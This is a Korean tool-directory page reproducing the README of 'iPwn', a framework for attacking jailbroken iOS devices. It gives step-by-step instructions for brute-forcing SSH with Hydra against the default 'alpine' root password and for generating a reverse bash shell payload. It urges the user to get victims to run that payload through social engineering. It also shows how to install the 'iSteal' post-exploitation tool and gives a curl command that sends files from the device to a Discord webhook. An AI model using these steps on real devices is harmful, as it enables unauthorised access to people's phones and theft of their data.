Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
iPwn — iOS 기기 익스플로잇을 위한 프레임워크 | Kitploit
도구/GitHubGitHub/brows3r/ipwn
iOS SecurityPassword AttacksPayload GenerationExploitationPost-ExploitationPenetration TestingMobile SecurityRemote Access Tool
GitHubbrows3r/ipwn

iPwn

iOS 기기 익스플로잇을 위한 프레임워크

저장소 보기
233365년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

iPwn

iOS 기기 공격을 위한 프레임워크입니다. image

<!> 기억하세요: 이 도구를 사용하여 접근하려는 아이폰은 탈옥되어 있어야 합니다 <!>

상태 - ❌

이 프로젝트는 아직 작업 중입니다. 장치 정보 수집 및 기타 작업을 위한 사후 공격 확장 및 옵션을 추가하고 있습니다. 또한, 일반 iOS 트윅에 페이로드를 넣어 리버스 셸을 쉽게 얻을 수 있는 방법도 연구 중입니다.

업데이트 로그

[6/2/21] - 장치를 컴퓨터에 연결하고 조작하려는 사람들을 위한 추가 메뉴가 추가되었습니다. 곧 더 많은 기능이 추가될 예정입니다.

[6/2/21] - 'iSteal' 사후 공격 도구에 4개의 추가 모듈이 추가되었습니다. 또한 checkra1n 탈옥을 설치하는 옵션이 추가되었습니다.

[5/25/21] - 'iSteal' 사후 공격 도구에 8개의 추가 모듈이 추가되었습니다.

[5/25/21] - 'iSteal' 사후 공격 도구에 2개의 추가 모듈이 추가되었습니다.

설명/사용 방법 [초보자용!!!]

iPwn은 iOS 기기를 공격하고 접근 권한을 획득하기 위한 프레임워크입니다. 또한 'iSteal'이라는 미니 프레임워크 확장이 있어 사후 공격(장치에 접근한 후)에 사용됩니다. 이 설명은 iOS 기기에 접근하고 정보를 수집하는 다양한 방법과 단계를 안내합니다.

iOS 기기에 접근하는 첫 번째 방법 - SSH 무차별 대입 공격.

대부분의 탈옥된 iOS 기기(Cydia 포함)에는 OpenSSH가 사전 패키징되어 있습니다. 그리고 일반적으로 자격 증명은 매우 취약하거나 흔하며, 가장 흔한 비밀번호 중 하나는 제 Github에서 iPwn을 다운로드한 경우 폴더에 포함된 단어 목록에 있을 것입니다.

그럼 시작해 봅시다! 먼저 스크립트를 실행합니다.

root@kitploit:~
python main.py

그런 다음 'brute' 명령어를 입력합니다. (도움말을 입력하여 명령어에 익숙해지려면 그렇게 해도 됩니다.) image

'brute' 명령어를 입력하면 'help'를 입력하여 사용 가능한 모든 명령어를 확인합니다. image 이제 'default' 명령어를 사용하여 가장 흔한 비밀번호가 포함된 단어 목록으로 SSH 무차별 대입 공격을 시작합니다. 대상의 IP 주소를 입력하라는 메시지가 나타납니다. 올바르고 유효한 IP 주소를 입력했는지 확인하고 Enter를 누른 후 다음 단계로 넘어갑니다. image

<!> 오류가 발생하는 경우, HYDRA가 설치되어 있는지 확인하세요. 아래 명령어로 HYDRA를 설치할 수 있습니다 <!>

root@kitploit:~
commands to install hydra:

sudo apt install hydra
sudo pacman -S hydra

이제 튜토리얼로 돌아가서, PC에 hydra가 설치되어 있다면 이미 무차별 대입을 시도하고 있을 것입니다. 약 20~40초 정도 기다리면 장치가 단어 목록에 제공된 기본/일반 자격 증명을 사용하는 경우 Hydra가 올바른 비밀번호를 보여주는 메시지를 표시합니다. image

보시다시피, 올바른 비밀번호는 'alpine'입니다. 이제 다른 터미널 창에서 'ssh root@ip_goes_here'를 입력하여 휴대폰에 로그인할 수 있습니다. 비밀번호를 묻는 메시지가 나타나면 Hydra에서 얻은 비밀번호를 입력하세요. image

이제 로그인되었습니다!

image

이 시점에서 우리는 아마도 휴대폰에 대한 정보를 수집하고 제어하고 싶을 것입니다. 이는 나중에 하게 됩니다. 먼저 몇 가지 매우 중요한 것을 설치해야 하기 때문입니다. 모든 것을 자동화하는 설정 파일을 전송하기 위해 SCP를 사용하려면 그렇게 해도 됩니다. 파일은 /post-exploitation/post.sh에 있습니다. 'post.sh' 파일을 iOS 장치로 전송한 후 'bash post.sh'를 실행하면 사후 공격 도구를 설치하고 설정하기 시작합니다.

<!> 참고: 아래 명령어는 필수 패키지와 도구를 수동으로 설치하려는 사람들을 위한 것입니다 <!>

root@kitploit:~
run all these commands to setup/install everything thats needed:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

이제 모든 것이 설치되었으므로 'iSteal' 폴더로 이동하여 'iSteal' 사후 공격 스크립트를 실행할 수 있습니다.

root@kitploit:~
python3 post.py

<!> 참고: 파이썬 파일을 실행할 때는 "python"이나 "py" 대신 "python3"를 사용해야 합니다 <!>

이제 스크립트가 로드되었을 것입니다. 'help' 명령어를 사용하여 둘러보고 싶다면 그렇게 하셔도 됩니다. image

이제 'list' 명령어를 사용하여 사후 공격에 사용 가능한 모듈/옵션을 확인합니다. image

<!> 명심하세요: 사후 공격 스크립트에 많은 업데이트가 있을 예정이며, 더 많은 모듈이 추가될 것입니다. 따라서 이 이미지는 정확성을 위해 업데이트될 것입니다 <!>

모듈을 사용하려면 'use specific/module'을 입력하면 됩니다. 예: use modules/list_installed_default_apps

보시다시피, 해당 모듈을 실행하면 대상 iOS 기기에 설치된 기본 애플리케이션이 표시됩니다. image

iOS 기기에 접근하는 두 번째 방법 - 리버스 셸.

이제 두 번째 방법을 보여드리겠습니다. 이 방법은 조금 더 고급입니다. 이 부분에는 사진을 포함하지 않겠습니다.

root@kitploit:~
run the iPwn framework by doing 'python main.py'
type in the 'payload' command
wait for the payload factory to load.
select a payload of your choice, Example: use payloads/factory/reverse_bash
enter your IP
enter your Port
then you should get a message that says 'payload generated'
type in the 'back' command to go back to the main menu
type in the 'listen' command to start listening for incoming connections
make sure that your victim runs the script via terminal or throught their own way, try social engineering, be creative!
once the script is executed on the victims iOS device, you should get a connection
install the important packages via transferring the 'post.sh' located in /post-exploitation and executing it, or manually do it yourself.
you can now run the 'iSteal' or 'AutoEnum' post-exploitation tools
have fun! :)

<!> 2단계를 수행하다가 중요한 패키지/도구를 설치하는 부분에서 막히면, 1단계로 가서 패키지/도구 설치 가이드를 참고하세요! <!>

파일 전송/추출

iOS 기기로 파일을 전송하는 방법은 여러 가지가 있으며, 파일을 다운로드하는 방법도 많습니다. iOS 기기에서 파일을 추출하고 다운로드하는 가장 쉬운 방법은 Curl과 Discord 웹훅을 사용하는 것입니다.

<!> 참고: 아래 부분은 curl을 사용하여 iOS 기기에서 파일을 추출하고 다운로드하는 방법을 설명합니다 <!>

root@kitploit:~
Step 1: Create a discord server
Step 2: Create a webhook and copy the link
Step 3: On the iOS device, navigate towards the directory that contains the file you want to retrieve.
Step 4: enter the command below (replace file_here.txt with the name of your file, replace webhook_url_here with your webhook url)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

Step 5: wait around 10-50 seconds
Done! The file should now be uploaded to your discord server. You can now download/view the file.

테스트된 OS

root@kitploit:~
Windows 10 - Stable
Garuda Linux - Stable
Arch based distros - Stable

지원 및 테스트된 iOS 기기

root@kitploit:~
지원 기기 [사후 공격 확장은 이 모든 기기에서 작동해야 함]
-----------------
4세대 이후의 iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

직접 테스트한 기기 [제가 직접 테스트한 기기]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4세대

스크린샷

image image image image

크레딧

[https://github.com/0x1CA3]

도구 다운로드